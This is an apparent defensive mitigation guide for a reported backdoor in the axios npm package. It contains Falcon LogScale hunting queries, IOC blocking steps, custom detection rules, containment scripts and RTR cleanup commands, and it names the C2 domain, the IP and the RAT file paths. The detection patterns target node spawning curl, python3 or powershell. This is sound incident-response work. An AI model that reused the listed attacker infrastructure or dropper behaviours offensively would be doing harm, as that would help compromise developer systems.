Axios Supply Chain Attack: CrowdStrike Falcon Mitigation Guide#

Incident Date: March 31, 2026 (00:21–03:29 UTC)
Guide Published: April 1, 2026
Severity: Critical
Platform: CrowdStrike Falcon (All tiers)

For the full incident narrative and non-Falcon detection logic, see the companion article: Axios npm Supply Chain Attack: Incident Analysis & Response Guide

Overview#

On March 31, 2026, threat actors published two backdoored versions of the axios npm package (1.14.1 and 0.30.4) by compromising maintainer jasonsaayman’s npm account. The malicious dependency plain-crypto-js@4.2.1 was injected via package.json, which deployed a cross-platform Remote Access Trojan (RAT) to macOS, Windows, and Linux hosts during npm install. The RAT established persistent C2 communication to sfrclak.com:8000.

This guide covers the end-to-end CrowdStrike Falcon response workflow: threat hunting, IOC blocking, custom IOA rules, Real-Time Response remediation, and prevention hardening.

Attack Chain Summary#

Section 1: Threat Hunting in Falcon Event Search (LogScale)#

Run these queries in Falcon Event Search (Next-Gen SIEM / LogScale). Adjust the @timestamp window to cover March 30–31, 2026 00:00–06:00 UTC for incident scoping, or set to a rolling 7-day window for ongoing monitoring.

Query 1 — Detect Malicious Postinstall Execution#

Catches node setup.js spawned from npm or node, the moment of initial compromise.

#event_simpleName=ProcessRollup2
| CommandLine=/setup\.js/i OR CommandLine=/plain-crypto-js/i
| ParentBaseFileName=/npm|node/i
| groupBy([ComputerName, UserName, CommandLine, ParentBaseFileName, ParentCommandLine, @timestamp])
| sort(@timestamp, order=desc)

What to look for: Any result from a developer workstation, CI/CD agent, or build server during the attack window. A single match is a confirmed exposure event.

Query 2 — Detect Anomalous Child Processes from npm/node#

Catches the dropper spawning platform download utilities (curl, python3, osascript, cscript) from within node_modules/.

#event_simpleName=ProcessRollup2
| ParentBaseFileName=/npm\.cmd|npm|node\.exe|node/i
| FileName=/curl|python3|osascript|cscript|powershell/i
| CommandLine=/node_modules/i OR ParentCommandLine=/node_modules/i
| groupBy([ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, @timestamp])
| sort(@timestamp, order=desc)

What to look for: node or npm spawning shell utilities directly. Legitimate builds do not produce this pattern.

Query 3 — Detect C2 Network Connections#

Catches outbound connections to the C2 infrastructure at sfrclak.com / 142.11.206.73 on port 8000.

#event_simpleName=NetworkConnectIP4
| RemoteAddressIP4="142.11.206.73" OR RemotePort="8000"
| groupBy([ComputerName, UserName, RemoteAddressIP4, RemotePort, LocalAddressIP4, @timestamp])
| sort(@timestamp, order=desc)

#event_simpleName=DnsRequest
| DomainName=/sfrclak\.com/i
| groupBy([ComputerName, UserName, DomainName, @timestamp])
| sort(@timestamp, order=desc)

What to look for: Any hit here means the dropper reached the network. If this fires alongside Query 1, the host is compromised (RAT likely deployed).

Query 4 — Detect RAT Artifact File Writes#

Catches second-stage RAT files written to disk.

#event_simpleName=NewFileInfo
| TargetFileName=/wt\.exe|ld\.py|com\.apple\.act\.mond/i
| groupBy([ComputerName, UserName, TargetFileName, TargetDirectoryName, @timestamp])
| sort(@timestamp, order=desc)

What to look for:

• Windows: %PROGRAMDATA%\wt.exe
• Linux: /tmp/ld.py
• macOS: /Library/Caches/com.apple.act.mond

Any match confirms second-stage deployment — treat as active RAT infection.

Query 5 — Detect Dropper Self-Deletion (Anti-Forensics)#

Catches the postinstall dropper deleting itself to cover tracks.

#event_simpleName=DeleteFile
| TargetFileName=/setup\.js|plain-crypto-js/i
| ParentBaseFileName=/npm|node/i
| groupBy([ComputerName, UserName, TargetFileName, @timestamp])
| sort(@timestamp, order=desc)

Query 6 — Detect Recurring C2 Beaconing (60-Second Pattern)#

After deployment the RAT beacons every 60 seconds. This query identifies hosts with persistent, regular outbound connections to port 8000.

#event_simpleName=NetworkConnectIP4
| RemotePort="8000"
| groupBy([ComputerName, RemoteAddressIP4], function=count())
| count > 5
| sort(count, order=desc)

What to look for: Hosts with >5 connections to port 8000 — especially to 142.11.206.73. This pattern indicates active RAT beaconing.

Query 7 — Full Compromise Assessment (Combined)#

Use this broad sweep to identify all potentially affected hosts in one pass.

(#event_simpleName=ProcessRollup2 CommandLine=/plain-crypto-js|setup\.js/i)
OR (#event_simpleName=NetworkConnectIP4 RemoteAddressIP4="142.11.206.73")
OR (#event_simpleName=DnsRequest DomainName=/sfrclak\.com/i)
OR (#event_simpleName=NewFileInfo TargetFileName=/wt\.exe|ld\.py|com\.apple\.act\.mond/i)
| groupBy([ComputerName, UserName, #event_simpleName, @timestamp])
| sort(@timestamp, order=desc)

Section 2: IOC Management — Block at Sensor Level#

Add the following indicators to Falcon IOC Management (Endpoint Security → IOC Management → Create IOC). Set action to Block + Detect for all.

Domains and IPs#

Steps:

1. Navigate to Falcon Console → Endpoint Security → IOC Management
2. Select Create Indicator
3. Enter each value, set Action: Block, Severity: Critical, apply to all relevant Host Groups
4. Enable Apply to all platforms

File Hashes#

If you recover the RAT binaries from affected endpoints, submit their SHA256 hashes as Custom Hashes with Block + Detect. The dropper package hash for plain-crypto-js@4.2.1 should be compared against npm audit output:

Section 3: Custom IOA Rules#

Deploy these Custom IOA rules to detect and prevent this attack pattern on an ongoing basis. This catches future variants even if the C2 domain or package names change.

Navigate to: Falcon Console → Endpoint Security → Custom IOA Rules → Create Rule Group

Rule 1 — npm/node Spawning Download Utilities#

Rule Type: Process Creation
Platform: Windows, Linux, macOS
Name: SUPPLY-CHAIN-001: Node Spawning Suspicious Child Process

Rule 2 — Node Executing Postinstall Scripts with Obfuscation Markers#

Rule Type: Process Creation
Platform: Windows, Linux, macOS
Name: SUPPLY-CHAIN-002: Node Postinstall Obfuscated Execution

Rule 3 — Suspicious Outbound from npm Context#

Rule Type: Network Activity (if available in your tier)
Name: SUPPLY-CHAIN-003: npm Context Outbound to Non-registry Host

Assign all rule groups to your active Prevention Policies before they take effect.

Section 4: Network Containment#

For any host where Query 3 (C2 connection) or Query 4 (RAT artifact) fired, immediately apply Network Containment.

Steps#

1. In Falcon Console → Endpoint Security → Endpoint Management, locate the affected host
2. Select the host → Actions → Network Contain
3. Confirm containment — the host retains Falcon sensor connectivity but all other network traffic is blocked
4. Proceed to Real-Time Response (Section 5) for cleanup before releasing containment

Do NOT release containment until RAT artifacts are removed and persistence mechanisms are cleared.

Bulk Containment via API (for CI/CD agents)#

If multiple build agents are affected, use the FalconPy SDK:

from falconpy import Hosts

falcon = Hosts(client_id="YOUR_CLIENT_ID", client_secret="YOUR_CLIENT_SECRET")

# Get device IDs matching criteria (e.g., by tag or hostname pattern)
response = falcon.query_devices_by_filter(filter="hostname:'build-agent-*'")
device_ids = response["body"]["resources"]

# Apply containment
falcon.perform_action(action_name="contain", ids=device_ids)
print(f"Contained {len(device_ids)} hosts")

Section 5: Real-Time Response (RTR) — Remediation Commands#

Connect to contained hosts via RTR (Endpoint Management → Real-Time Response) to perform cleanup. These commands confirm compromise status and remove RAT artifacts.

Windows RTR Commands#

# 1. Check for malicious axios versions in all node_modules
Get-ChildItem -Path C:\ -Recurse -Filter "package.json" -ErrorAction SilentlyContinue |
  Select-String '"axios".*"1\.14\.1\|0\.30\.4"' | Select-Object Path

# 2. Check for RAT artifact
Test-Path "$env:PROGRAMDATA\wt.exe"
Get-Item "$env:PROGRAMDATA\wt.exe" -ErrorAction SilentlyContinue | Select-Object Name, CreationTime, LastWriteTime, Length

# 3. Remove RAT artifact
Remove-Item "$env:PROGRAMDATA\wt.exe" -Force -ErrorAction SilentlyContinue

# 4. Check for persistence (Run keys, Task Scheduler)
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | Format-List
Get-ScheduledTask | Where-Object { $_.TaskPath -match "wt|npm|node" } | Select-Object TaskName, TaskPath

# 5. Check active network connections to C2
netstat -ano | findstr "142.11.206.73"
netstat -ano | findstr ":8000"

# 6. Kill any active C2 process
Get-Process | Where-Object { $_.Path -match "wt\.exe" } | Stop-Process -Force

Linux RTR Commands#

# 1. Check for RAT artifact
ls -la /tmp/ld.py 2>/dev/null && echo "RAT FOUND" || echo "Not present"

# 2. Remove RAT artifact
rm -f /tmp/ld.py

# 3. Check for persistence (cron, systemd)
crontab -l 2>/dev/null | grep -i "ld.py\|npm\|node"
find /etc/systemd/system /usr/lib/systemd/system -name "*.service" | xargs grep -l "ld.py" 2>/dev/null
find /etc/cron.* /var/spool/cron -type f | xargs grep -l "ld.py\|npm_rat" 2>/dev/null

# 4. Kill active process
pkill -f "ld.py" 2>/dev/null

# 5. Check for active C2 connections
ss -tnp | grep 142.11.206.73
ss -tnp | grep :8000

# 6. Audit npm packages on system
find / -name "package.json" -path "*/axios/package.json" 2>/dev/null | \
  xargs grep -l '"version": "1.14.1"\|"version": "0.30.4"' 2>/dev/null

macOS RTR Commands#

# 1. Check for RAT artifact
ls -la "/Library/Caches/com.apple.act.mond" 2>/dev/null && echo "RAT FOUND" || echo "Not present"

# 2. Remove RAT artifact
rm -f "/Library/Caches/com.apple.act.mond"

# 3. Check for persistence (LaunchAgents, LaunchDaemons)
find /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents -name "*.plist" 2>/dev/null | \
  xargs grep -l "act.mond\|npm\|plain-crypto" 2>/dev/null

# 4. Check active C2 connections
lsof -i :8000 | grep -v LISTEN
lsof -i @142.11.206.73

# 5. Kill active process
pkill -f "com.apple.act.mond" 2>/dev/null

# 6. Remove any malicious LaunchAgent
launchctl unload ~/Library/LaunchAgents/com.apple.act.mond.plist 2>/dev/null
rm -f ~/Library/LaunchAgents/com.apple.act.mond.plist 2>/dev/null

Section 6: npm Package Remediation#

After RAT removal, remediate the npm dependency itself on all affected systems.

Verify Exposure#

# Check all installed axios versions across project dependencies
npm list axios 2>/dev/null
find . -name "package-lock.json" -exec grep -l '"axios"' {} \;
find . -name "package.json" -not -path "*/node_modules/*" | \
  xargs grep -l '"axios"'

Remove and Replace#

# Uninstall malicious version and install clean version
npm uninstall axios
npm install axios@1.14.0     # or latest verified clean version

# Confirm plain-crypto-js is gone
npm list plain-crypto-js       # should return empty
find ./node_modules -name "plain-crypto-js" -type d  # should return nothing

# Regenerate lock file
rm -f package-lock.json
npm install

Verify Package Integrity#

# Confirm axios version and lack of malicious dependency
npm list axios | grep axios
cat node_modules/axios/package.json | grep -E '"version"|"dependencies"'

# The clean axios should NOT contain plain-crypto-js in its dependencies

Section 7: Credential Rotation Requirements#

Any environment that ran npm install between March 30, 2026 23:59 UTC and March 31, 2026 03:29 UTC must treat all secrets as compromised. The RAT had full file system and network access.

Rotate Immediately#

• Cloud provider credentials (AWS, Azure, GCP) — IAM keys, service account tokens
• CI/CD pipeline secrets (GitHub Actions secrets, Jenkins credentials, GitLab CI variables)
• Database passwords and connection strings
• API keys for third-party services
• SSH private keys present on the system
• npm tokens (if present in .npmrc or environment variables)
• .env files and application configuration secrets

CrowdStrike Falcon Identity Protection#

If you have Falcon Identity Threat Protection, run a query for lateral movement from affected hosts:

#event_simpleName=UserLogon
| aid IN (/* affected host AIDs from earlier queries */)
| groupBy([ComputerName, UserName, LogonType, RemoteAddressIP4, @timestamp])
| sort(@timestamp, order=asc)

Look for unusual logons from affected hosts after the attack window, which may indicate credential harvesting and lateral movement.

Section 8: Prevention Policy Hardening#

After the incident, update your Falcon Prevention Policies to reduce exposure to future supply chain attacks.

Recommended Settings#

Script Control Considerations#

Enable Interpreter Only or Script Control on developer workstations where possible. This will flag obfuscated JavaScript execution from node_modules/ directories.

Section 9: Fusion SOAR — Automated Response Workflow#

If your Falcon tier includes Fusion SOAR, deploy this workflow to automate the initial response steps for future npm supply chain events.

Workflow Logic#

Trigger: Custom IOA Detection (SUPPLY-CHAIN-001 or SUPPLY-CHAIN-002)
  → Step 1: Get Host Details (aid, hostname, IP, OS)
  → Step 2: Apply Network Containment
  → Step 3: Create Incident (Severity: Critical, Assignment: SOC)
  → Step 4: Notify Slack/Teams: "Supply chain IOA triggered on [hostname] — auto-contained"
  → Step 5: Open RTR session, run platform-specific audit script
  → Step 6: Attach RTR output to incident
  → Step 7: Await analyst approval before releasing containment

This ensures that any future postinstall-based supply chain attack triggering these IOA rules results in immediate host isolation with zero manual delay.

Quick Reference: IOC Summary#

Response Checklist#

Immediate (0–2 hours)#

• Run Query 7 (Full Compromise Assessment) across all endpoints
• Add sfrclak.com and 142.11.206.73 to IOC Management as Block
• Network-contain any hosts where C2 connections or RAT artifacts were found
• Alert SOC and initiate P1 incident if any hosts are confirmed compromised

Short-Term (2–24 hours)#

• Deploy Custom IOA rule group (Section 3) to all prevention policies
• Run npm remediation commands on all developer and CI/CD systems
• Begin credential rotation for all affected environments
• Run RTR cleanup on contained hosts
• Release containment only after cleanup and credential rotation confirmed

Ongoing#

• Enable Fusion SOAR workflow (Section 9) for automated future response
• Update Prevention Policy settings per Section 8
• Add file hashes of recovered RAT artifacts to IOC Management
• Review npm token hygiene and enforce token scoping/expiry policy
• Schedule dependency audit cadence (weekly npm audit in CI pipeline)

References#

• Elastic Security Labs — Inside the Axios supply chain compromise
• The Hacker News — Axios Supply Chain Attack Pushes Cross-Platform RAT
• CrowdStrike — Falcon Prevents NPM Package Supply Chain Attacks
• CrowdStrike — Customers Protected from Compromised npm Package
• Huntress — Supply Chain Compromise of axios npm Package
• Snyk — Axios npm Package Compromised
• Help Net Security — Axios npm packages backdoored
• Aikido Security — axios npm compromised, maintainer hijacked
• Wiz — Axios NPM Distribution Compromised
• SOCRadar — Axios npm Supply Chain Attack 2026 CISO Guide

Created: 2026-04-01
Last modified: 2026-04-01